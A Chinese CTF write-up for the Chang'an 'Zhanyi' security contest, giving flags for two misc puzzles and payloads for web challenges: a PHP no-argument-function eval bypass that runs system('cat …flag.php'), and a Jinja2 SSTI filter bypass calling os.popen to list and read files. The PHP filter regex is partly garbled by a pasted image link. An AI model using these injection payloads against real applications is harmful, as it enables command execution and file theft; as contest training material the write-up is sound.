长安“战疫”网络安全卫士守护赛writeup

长安“战疫”网络安全卫士守护赛writeup

misc

八卦迷宫

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8NUJnLYi-1641715550914)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108124601892.png)]

得到flag

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

西安加油

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xJv5KOma-1641715550914)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174108640.png)]

tcp流里面找到base64编码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lLtp2XPH-1641715550915)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174037547.png)]

在线转为zip解压

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UbVG3RR6-1641715550916)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174142276.png)]

拼图得到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xqpuvdk0-1641715550918)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174221827.png)]

cazy{make_XiAN_great_Again}

web

RCE_No_Para
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { 
  if(!preg_match('![img](file:///C:\Users\M1keal\AppData\Roaming\Tencent\QQTempSys\V7(XMWRN]{G8~CI}BCCR3QC.gif)ssion|end|next|header|dir/i',$_GET['code'])){
    eval($_GET['code']);
  }else{
    die("Hacker!");
  }
}else{
  show_source(__FILE__);
}
?>


参考链接

PHP Parametric Function RCE · sky’s blog (skysec.top)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VMhSM5Wb-1641715550919)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108134940618.png)]

所以paylaod:

?m1kael=system(“cat%20/var/www/html/flag.php”);&code=eval(current(current(get_defined_vars())));

Flask

根据提示

admin?name=payload?1.js?

然后过滤了[]和_

参考链接

以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区 (aliyun.com)

所以payload:

{%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22))|attr(%22\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f%22)(%22os%22)|attr(%22popen%22)(%22ls /%22)|attr(%22read%22)()%}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IaKr1Yp7-1641715550919)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108144609879.png)]

然后

{%print(lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"))|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("os")|attr("popen")("cat%20/f*")|attr("read")()%}%20.js?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Suv667b-1641715550920)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108145645686.png)]

Flag配送中心

CVE-2016-5385

vulhub漏洞复现 · Ywc’s blog (yinwc.github.io)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-N2RNwTfY-1641715550920)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108163206016.png)]
在这里插入图片描述

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值